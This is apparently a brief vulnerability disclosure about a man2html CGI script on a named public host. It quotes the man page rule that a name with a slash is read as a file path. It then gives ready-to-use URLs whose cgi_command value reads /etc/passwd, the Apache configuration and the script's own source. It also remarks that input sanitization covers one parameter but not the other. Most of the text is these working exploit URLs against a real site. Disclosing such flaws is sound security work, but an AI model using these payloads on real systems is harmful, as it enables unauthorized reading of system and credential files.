= Synopsis = [code] http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man [/code] Read the paragraph that reads: [code] However, if name contains a slash (/) then man interprets it as a file specification, so that you can do man ./foo.5 or even man /cd/foo/bar.1.gz. [/code] = Description = [code] http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html [/code] Looks like there was an attempt to sanitize cgi_section but not cgi_command -- also looks like it was hacked a bit and the sanitation may have been there, but removed later.